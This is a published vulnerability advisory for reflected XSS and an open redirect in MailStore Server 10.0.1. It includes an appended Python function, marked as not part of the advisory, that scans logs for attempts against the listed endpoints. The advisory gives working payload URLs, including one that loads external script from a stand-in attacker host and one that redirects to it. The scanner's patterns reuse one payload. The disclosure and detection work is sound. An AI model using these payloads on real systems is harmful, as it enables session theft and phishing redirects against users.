MailStore 10.0.1 Cross Site Scripting / Open Redirect

2017.02.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server

Affected Products
   MailStore Server Version 10.0.1.12148 was tested
   According to the vendor:
   - MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability
   - MailStore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability

References
   https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
   CWE-79 https://cwe.mitre.org/data/definitions/79.html
   CWE-601 https://cwe.mitre.org/data/definitions/601.html

Summary:
   "MailStore Server is one of the world's leading solutions for email archiving, management and compliance for small and medium-sized businesses."
   The built-in web application does not properly validate untrusted input in several variables. This leads to both Reflected Cross-Site Scripting (XSS) and an Open Redirect.

Effect:
   To exploit the reflected XSS, the victim has to be authenticated to the MailStore web application. If the victim clicks on a link sent by an attacker, the attacker could, for example, copy the victim's session ID to his own data sink.
   By sending another link with a crafted URL, the attacker could redirect the victim to a malicious website, while the link itself points to the trusted MailStore address. The victim is not required to be authenticated.

Vulnerable Scripts
   Reflected XSS for authenticated users:
   - /search-result/, Parameters c-f, c-q, c-from and c-to
   - /message/ajax/send/, Parameter recipient
   Open Redirect:
   - derefer/, Parameter url

Example for reflected XSS:
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
   #Load external JS-Code
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E

Example for Open Redirect:
   https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de

Solution:
   Update to Version 10.0.2

Disclosure Timeline:
   2017/01/09 vendor contacted
   2017/01/10 initial vendor response asking for technical details
   2017/01/10 provided vendor with the advisory including technical details
   2017/01/13 vendor provided information about affected versions and mitigation
   2017/01/18 update published by vendor
   2017/01/31 public disclosure

Credits:
   Tobias Glemser
   tglemser@secuvera.de
   secuvera GmbH
   https://www.secuvera.de

Disclaimer:
   All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.
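For operators who want to check web or proxy logs for requests against the endpoints and parameters listed under "Vulnerable Scripts", the following Python function is an added example and is not part of the secuvera advisory or of MailStore. The markup heuristic, the trusted-host set and the sample request lines (including the placeholder host attacker.invalid) are assumptions constructed for illustration.

```python
# Added example (not from the advisory): flag request URIs that match the
# advisory's vulnerable endpoints and parameters in web/proxy access logs.
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> parameters named in the advisory.
XSS_PARAMS = {
    "/search-result/": {"c-f", "c-q", "c-from", "c-to"},
    "/message/ajax/send/": {"recipient"},
}
# Heuristic (assumption): angle brackets, inline event handlers and
# javascript: URIs are not expected in search filters or recipients.
MARKUP = re.compile(r"[<>]|\bon\w+\s*=|javascript:", re.I)
# Assumption: hosts the archive may legitimately redirect to.
TRUSTED_HOSTS = {"www.example.com"}

def classify(request_uri):
    """Return a list of findings for one request URI (path + query)."""
    parts = urlsplit(request_uri)
    # parse_qs URL-decodes the values, so encoded markup is matched too.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for endpoint, names in XSS_PARAMS.items():
        if parts.path.endswith(endpoint):
            for name in sorted(names & params.keys()):
                if any(MARKUP.search(v) for v in params[name]):
                    findings.append(f"xss-probe:{name}")
    if parts.path.endswith("/derefer/"):
        for target in params.get("url", []):
            # Absolute and protocol-relative targets both carry a hostname.
            host = urlsplit(target).hostname
            if host and host.lower() not in TRUSTED_HOSTS:
                findings.append(f"external-redirect:{host.lower()}")
    return findings

# Constructed sample request URIs; the first reuses the advisory's own example.
SAMPLE = [
    "/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E",
    "/a/10.0.1.12148/search-result/?c-q=invoice&c-f=all",
    "/a/10.0.1.12148/derefer/?url=http%3a%2f%2fattacker.invalid",
    "/a/10.0.1.12148/derefer/?url=https%3a%2f%2fwww.example.com%2fhelp",
]

if __name__ == "__main__":
    for uri in SAMPLE:
        print(classify(uri) or "clean", uri)
```

The event-handler pattern can match benign values such as `online=1`, so treat hits as leads for review rather than confirmed attempts.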



Copyright 2018, cxsecurity.com

 
